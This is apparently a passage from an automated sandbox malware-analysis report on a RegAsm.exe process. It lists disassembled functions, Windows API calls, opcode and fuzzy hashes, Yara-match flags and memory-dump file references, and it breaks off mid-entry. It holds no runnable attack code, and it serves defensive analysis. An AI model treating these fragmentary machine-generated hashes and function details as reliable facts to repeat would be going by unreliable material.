                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                    Function 022AFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                    Function 00413C1E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 413c1e-413c1f 1 413c21 0->1 2 413c3f 0->2 3 413c22-413c28 1->3 4 413c41-413c57 2->4 5 413c12 2->5 6 413bd0-413bde 3->6 7 413c2a-413c30 3->7 8 413c58 4->8 5->0 11 413be0-413be7 6->11 12 413bed-413c01 6->12 7->2 9 413c5a 8->9 10 413c8f-413cb1 8->10 13 413cdb-413d1a call 417423 call 404683 call 424a53 9->13 14 413c5c-413c6b 9->14 11->12 12->5 25 413d3a-413d40 13->25 26 413d1c-413d2b PostThreadMessageW 13->26 14->3 19 413c6d-413c6f 14->19 19->8 20 413c71-413c8d 19->20 20->10 26->25 27 413d2d-413d37 26->27 27->25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2893AGJN$2893AGJN
                                                    • API String ID: 0-3493736453
                                                    • Opcode ID: f366a153073cc287d71205e634e4099120d09fc593115756e0191687e8a9866e
                                                    • Instruction ID: 16efdea379a958b65a2edc849cb9082c8374a143c01641c89fdf3d03234b2b84
                                                    • Opcode Fuzzy Hash: f366a153073cc287d71205e634e4099120d09fc593115756e0191687e8a9866e
                                                    • Instruction Fuzzy Hash: 4331C277E05285AFD721CF64CC818EEBF38DE85321B04819ED550E7302E2295D078BD5
                                                    Function 00413CB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(2893AGJN,00000111,00000000,00000000), ref: 00413D27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: 2893AGJN$2893AGJN
                                                    • API String ID: 1836367815-3493736453
                                                    • Opcode ID: 15d4a5cabbd77b9f932a95391c349ba6dab6c218afb638aa82c614608083e448
                                                    • Instruction ID: b32df57bf3afb1e7ec8b5d0bfabb31d7ea178725570b38adeb9c3eca0e1f5ca0
                                                    • Opcode Fuzzy Hash: 15d4a5cabbd77b9f932a95391c349ba6dab6c218afb638aa82c614608083e448
                                                    • Instruction Fuzzy Hash: D201D6B2E4025C7AEB01AAE19C81DEF7B7CDF41798F058069FA1467240D67C4E0647B5
                                                    Function 0042C4E3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 52 42c4e3-42c524 call 4046d3 call 42d393 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C51F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: qaA
                                                    • API String ID: 3298025750-3612340373
                                                    • Opcode ID: 4d167ad8a96a4873fdc95980513ac65ce47b07458e018b7296676591b09ab6be
                                                    • Instruction ID: 21114bcf9a831dd49170578b544c398cfba5ab4b8ba472ff99f1cab5a7023719
                                                    • Opcode Fuzzy Hash: 4d167ad8a96a4873fdc95980513ac65ce47b07458e018b7296676591b09ab6be
                                                    • Instruction Fuzzy Hash: B2E065B2A046047BD610EE69EC41FDB37ADEFC9750F004819FE08A7242D675BD208AB9
                                                    Function 0042C493 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 282 42c493-42c4d4 call 4046d3 call 42d393 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E1AB,?,?,00000000,?,0041E1AB,?,?,?), ref: 0042C4CF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 22a74b4be79a72438aace3d6769ef4e8d77e001e7d7cc57e73311b6a71a1226b
                                                    • Instruction ID: 7902fc121804849b4ae167e2e2203352f9b9838c31bc472dd2287a6a413fcd61
                                                    • Opcode Fuzzy Hash: 22a74b4be79a72438aace3d6769ef4e8d77e001e7d7cc57e73311b6a71a1226b
                                                    • Instruction Fuzzy Hash: 4FE065B26042047FD614EE59EC41E9B77ADEFCA710F004819FA08A7281D675B9108AB9
                                                    Function 0042C533 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 292 42c533-42c56f call 4046d3 call 42d393 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNELBASE(?,00000000,00000000,?,3E31FB11,?,?,3E31FB11), ref: 0042C56A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: 6f6b8ef746ba347b20f769462d49e485aa4b492f020e9cb7d60ae701793b2272
                                                    • Instruction ID: b6a07d9171854dcf7766664fce49326b82e5cea9ad3d54569a95a2b3df775254
                                                    • Opcode Fuzzy Hash: 6f6b8ef746ba347b20f769462d49e485aa4b492f020e9cb7d60ae701793b2272
                                                    • Instruction Fuzzy Hash: EDE026712002047BC120FA1ADC01FDB775CDFC1314F00442AFA08A7241CA71BA0187F4

                                                    Non-executed Functions

                                                    Function 022A0080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [Pj
                                                    • API String ID: 0-2289356113
                                                    • Opcode ID: e7fb4617b24c58ae442d67e98a701616655fb8db35bf99513e950e84c91140bd
                                                    • Instruction ID: 000713b2004848e2777e9d3b9ac795453fc4b03eff7a6c1f2b8e240769c1a48a
                                                    • Opcode Fuzzy Hash: e7fb4617b24c58ae442d67e98a701616655fb8db35bf99513e950e84c91140bd
                                                    • Instruction Fuzzy Hash: C5F02B30214345BFEB22DB90CC95F2A7BA6BF41704F10C458F9455A496C777C911DB21
                                                    Function 022C26F8 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction ID: 4acb44648d2658455ee2d6d1a0cc5d5c03ee0f15c11f7f8f50accc296515afef
                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction Fuzzy Hash: DBF0FF2033415AEBCB08EA988DE07AA3396EB94300F64C33CAD49C725CDA619904C690
                                                    Function 02300101 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction ID: 916eee380caa6acf35b14888c8ee0e8127cb90f91c44c224c28b4c4696c7d7fe
                                                    • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction Fuzzy Hash: 59F05E762502049FCB1CCF04C4F0BB937A6AB80719F14406CE50B8FAD1D7359C42C664
                                                    Function 022A00EA Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94c7fe6625aa850e0663839db7788300cfc63d039aac49aff59b9ac0b8d8de99
                                                    • Instruction ID: f37f1356690c1568edfb994c5b18e054add5b91edb76853e5aadfdda9ea313ea
                                                    • Opcode Fuzzy Hash: 94c7fe6625aa850e0663839db7788300cfc63d039aac49aff59b9ac0b8d8de99
                                                    • Instruction Fuzzy Hash: 97E01A71564B81CFD321DF94D910B1AB3E5FF88B10F15483AE80597B64D7789A05CE52
                                                    Function 022B0060 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                    Function 022B0078 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                    Function 022B0048 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                    Function 022B00C4 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                    Function 022B010C Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                    Function 022B01D4 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                    Function 022B0C40 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                    • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                    • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                    • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                    Function 022B10D0 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                    Function 022B1148 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
